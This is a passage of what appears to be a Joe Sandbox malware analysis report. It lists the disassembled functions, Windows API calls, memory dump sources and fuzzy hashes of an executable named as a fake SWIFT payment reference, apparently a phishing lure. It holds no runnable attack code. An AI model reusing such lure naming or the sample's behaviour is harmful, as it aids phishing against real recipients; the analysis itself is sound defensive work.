Part of subcall function 0040683D: FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
Part of subcall function 0040683D: FindClose.KERNELBASE(00000000), ref: 00406854

lstrlenW.KERNEL32 ref: 0040233F
lstrlenW.KERNEL32(00000000), ref: 0040234A
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 729a783eca27f554c611e4ba6000d1fcbab3e5c8ea7f73232362adceb173aaa0
Instruction ID: 9b7d4dbee212afcf38129da4f7c322c85c69d028675fd491911c32071dce19bd
Opcode Fuzzy Hash: 729a783eca27f554c611e4ba6000d1fcbab3e5c8ea7f73232362adceb173aaa0
Instruction Fuzzy Hash: D3117C71900318AADB10EFB9D949A9EB6F8BF04348F10453FE405FB2D1E6B8C9408B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 9fccfe95b1a4bed92a5e2a1a1a6cbc94f9087b61eba1d613987d6439c8e41530
Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
Opcode Fuzzy Hash: 9fccfe95b1a4bed92a5e2a1a1a6cbc94f9087b61eba1d613987d6439c8e41530
Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 8f57ab04ce479e6f384afb71daf5a0ad1c889930ae6c694706ac65ac793ee6d7
Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
Opcode Fuzzy Hash: 8f57ab04ce479e6f384afb71daf5a0ad1c889930ae6c694706ac65ac793ee6d7
Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 940ed37a66827729c038e1b8cd76da8b0d573cfd7dc5a63c64a49e01cddd29a3
Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
Opcode Fuzzy Hash: 940ed37a66827729c038e1b8cd76da8b0d573cfd7dc5a63c64a49e01cddd29a3
Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 539ae3188a4c4aacacdcf38499ab856935469f4ad7a000a5955107d7b9fcad77
Instruction ID: 3efe7552218bc8638c386b206662a839c6be39db124f2854c1ef7ee844e7f5c6
Opcode Fuzzy Hash: 539ae3188a4c4aacacdcf38499ab856935469f4ad7a000a5955107d7b9fcad77
Instruction Fuzzy Hash: 39F0C232A00120EBDB11ABB89B4DAAD72A8AF44314F15443BE141B71C0DAFC4D01866E

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 07387bb625850943ad519744cb716489a10abda1bd00eedec3e0b61719a5cb9c
Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
Opcode Fuzzy Hash: 07387bb625850943ad519744cb716489a10abda1bd00eedec3e0b61719a5cb9c
Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
CloseHandle.KERNEL32(?), ref: 00405B20

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2e7e2aa4d72de09270b3b6845aff41f38ae00b54f46d65ff2e3fa17b0a003936
Instruction ID: 0bd1c2541dc6badd11bf791eeeb1c61969952e167bd25157246a8193e9c71b51
Opcode Fuzzy Hash: 2e7e2aa4d72de09270b3b6845aff41f38ae00b54f46d65ff2e3fa17b0a003936
Instruction Fuzzy Hash: C1E02632B00104EBCB14DFA8EDC086E73A5FB44310310483FE502B3290D6749C01CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
GetProcAddress.KERNEL32(00000000,?), ref: 00406901

Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05 Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000001), ref: 00402C14
InvalidateRect.USER32(?), ref: 00402C24

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID:
API String ID: 909852535-0
Opcode ID: d33419e91bae9b3dc09a0268fd640e139a72997e68fc10e20a1bd3dab651079b
Instruction ID: 5d06d3db9ebdc20fb085111a80a7421945f3272c8e7f14f2d46d8925ba4bfc91
Opcode Fuzzy Hash: d33419e91bae9b3dc09a0268fd640e139a72997e68fc10e20a1bd3dab651079b
Instruction Fuzzy Hash: 0FE0EC72710508FFEB11CBA4EE85DAEB7B9FB44355F00057AF602A11A0D7754D51DA28

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
GetLastError.KERNEL32 ref: 00405AC9

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
